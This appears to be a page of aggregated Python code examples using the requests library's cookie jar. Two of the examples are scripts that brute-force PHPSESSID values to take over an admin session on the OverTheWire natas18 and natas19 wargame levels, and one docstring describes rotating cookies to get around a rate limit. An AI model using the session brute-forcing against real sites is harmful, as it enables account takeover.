Exemplo n.º 1
0
def session_handling():

    sess = requests.Session()
    auth_username = '******'
    auth_password = '******'
    _payload = {'username': '******', 'password': '******'}

    # response = sess.get('http://natas18.natas.labs.overthewire.org/index.php', auth=HTTPBasicAuth(auth_username, auth_password))
    # dissect_response(response)

    response = sess.post('http://natas18.natas.labs.overthewire.org/index.php',
                         auth=HTTPBasicAuth(auth_username, auth_password),
                         data=_payload)

    for i in range(1, 461):
        new_cookie = RequestsCookieJar()
        new_cookie.set(name="PHPSESSID",
                       value=str(i),
                       domain='natas18.natas.labs.overthewire.org',
                       path="/")
        sess.cookies.update(new_cookie)
        response = sess.get(
            'http://natas18.natas.labs.overthewire.org/index.php',
            auth=HTTPBasicAuth(auth_username, auth_password))

        try:
            response.text.index("are logged in as a regular")
            print(str(i) + " non admin account")
        except:
            print(str(i) + " admin account ")
            print(response.text)
            break
Exemplo n.º 2
0
def brute_force_PHPSESSID():

    sess = requests.Session()
    auth_username = '******'
    auth_password = '******'
    _payload = {'username': '******', 'password': '******'}

    response = sess.post('http://natas19.natas.labs.overthewire.org/index.php',
                         auth=HTTPBasicAuth(auth_username, auth_password),
                         data=_payload)

    for i in range(1, 461):
        length = len(str(i))
        string_i = str(i)
        prefix = ""
        for i in range(length):
            prefix = prefix + "3" + string_i[i]

        cookie_value = prefix + "2d61646d696e"
        new_cookie = RequestsCookieJar()
        new_cookie.set(name="PHPSESSID",
                       value=cookie_value,
                       domain='natas19.natas.labs.overthewire.org',
                       path="/")
        sess.cookies.update(new_cookie)

        response = sess.get(
            'http://natas19.natas.labs.overthewire.org/index.php',
            auth=HTTPBasicAuth(auth_username, auth_password))
        try:
            response.text.index("are logged in as a regular")
            print(prefix + " 2d61646d696e" +
                  " non admin account: regular user")
        except:
            try:
                response.text.index("Uninitialized string offset:")
                print(prefix + " 2d61646d696e" + " uninitialized")
            except:
                try:
                    response.text.index(
                        "login with your admin account to retrieve credentials for"
                    )
                    print(prefix + " 2d61646d696e" +
                          " non admin account: homepage")
                except:
                    print(prefix + " 2d61646d696e" + " admin account ")
                    print(response.text)
                    break
Exemplo n.º 3
0
def loginwithcookies():
    cookievalue=None
    rsp =requests.post(loginurl,logindata)
    cookiesjar = RequestsCookieJar()
    #requests.post(loginurl,logindata,cookies=cookiesjar)
    #cookiesjar.set("JSESSIONID",cookievalue)
    return cookiesjar
    pass
Exemplo n.º 4
0
def set_cookies(*args: Union[Mapping[str, Any], str],
                clear: bool = True) -> None:
    """Sets multiple cookies at once to cycle between. Takes same arguments as set_cookie.

    Unlike set_cookie, this function allows for multiple cookies to be used at once.
    This is so far the only way to circumvent the rate limit.

    If clear is set to False the previously set cookies won't be cleared.
    """
    if clear:
        cookies.clear()

    for cookie in args:
        if isinstance(cookie, Mapping):
            cookie = {k: str(v)
                      for k, v in cookie.items()
                      }  # SimpleCookie needs a string
        cookie = SimpleCookie(cookie)

        jar = RequestsCookieJar()
        jar.update(cookie)
        cookies.append(jar)
Exemplo n.º 5
0
    def prepare_request(self, request):
        """Constructs a :class:`PreparedRequest <PreparedRequest>` for
        transmission and returns it. The :class:`PreparedRequest` has settings
        merged from the :class:`Request <Request>` instance and those of the
        :class:`Session`.

        :param request: :class:`Request` instance to prepare with this
            session's settings.
        :rtype: requests.PreparedRequest
        """
        cookies = request.cookies or {}

        # Bootstrap CookieJar.
        if not isinstance(cookies, cookielib.CookieJar):
            cookies = cookiejar_from_dict(cookies)

        # Merge with session cookies
        merged_cookies = merge_cookies(
            merge_cookies(RequestsCookieJar(), self.cookies), cookies)

        # Set environment's basic authentication if not explicitly set.
        auth = request.auth
        if self.trust_env and not auth and not self.auth:
            auth = get_netrc_auth(request.url)

        p = CuPreparedRequest()
        p.prepare(
            method=request.method.upper(),
            url=request.url,
            files=request.files,
            data=request.data,
            json=request.json,
            headers=merge_setting(request.headers,
                                  self.headers,
                                  dict_class=CaseInsensitiveDict),
            params=merge_setting(request.params, self.params),
            auth=merge_setting(auth, self.auth),
            cookies=merged_cookies,
            hooks=merge_hooks(request.hooks, self.hooks),
        )
        return p
Exemplo n.º 6
0
 def __init__(self, base, username=None, password=None, site='default', state=None, unifios=None):
     self.base = base
     self.site = site
     self.username = username
     self.password = password
     self._set_type(unifios)
     self.session = True if state else False
     self.cookies = requests.cookies.cookiejar_from_dict(json.loads(state)) if state else RequestsCookieJar()
     if None == unifios:
         self._check_unifios()
     else:
         self._set_type(unifios=unifios)